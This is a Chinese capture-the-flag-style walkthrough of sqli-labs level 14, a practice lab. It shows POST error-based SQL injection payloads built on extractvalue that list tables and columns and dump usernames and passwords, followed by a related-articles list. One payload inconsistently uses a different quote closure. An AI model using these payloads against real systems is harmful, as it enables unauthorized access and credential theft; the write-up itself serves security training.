sqli-labs第十四关——“POST报错注入

一:判断注入类型

和上一关一样,输入如下代码,回显报错,其余类型无回显

复制代码
uname=1"&passwd=123

判断为双引号字符型,尝试闭合

判断正确,成功登录

二:开始攻击

1.爆数据库名

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select database())))#&passwd=123

2. 爆表名

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#&passwd=123

3.爆列名

复制代码
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))#&passwd=123

4.爆数据

判断数据量

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select count(*) from users)))#&passwd=123

分两段爆数据

复制代码
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))#&passwd=123
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))#&passwd=123

❀❀❀ 完结撒花!! ❀❀❀

相关推荐
StarRocks_labs3 小时前
StarRocks Community Monthly Newsletter (Jun)
数据库·starrocks·数据湖·物化视图·存算分离
光电的一只菜鸡4 小时前
ubuntu之坑(十五)——设备树
linux·数据库·ubuntu
ob熔天使——武5 小时前
MySQL
数据库·mysql
小光学长5 小时前
基于vue框架的防疫物资仓库管理系统09y38(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库
野生技术架构师9 小时前
MySQL数据实时同步到Elasticsearch的高效解决方案
数据库·mysql·elasticsearch
白仑色9 小时前
Oracle 高可用性与安全性
数据库·oracle·数据安全·goldengate·高可用架构
紫无之紫10 小时前
SQL性能调优经验总结
数据库·sql·性能调优
CZZDg10 小时前
Redis Sentinel哨兵集群
java·网络·数据库
__风__10 小时前
PostgreSQL ExecInitIndexScan 函数解析
数据库·postgresql
小云数据库服务专线10 小时前
GaussDB in的用法
数据库·sql·gaussdb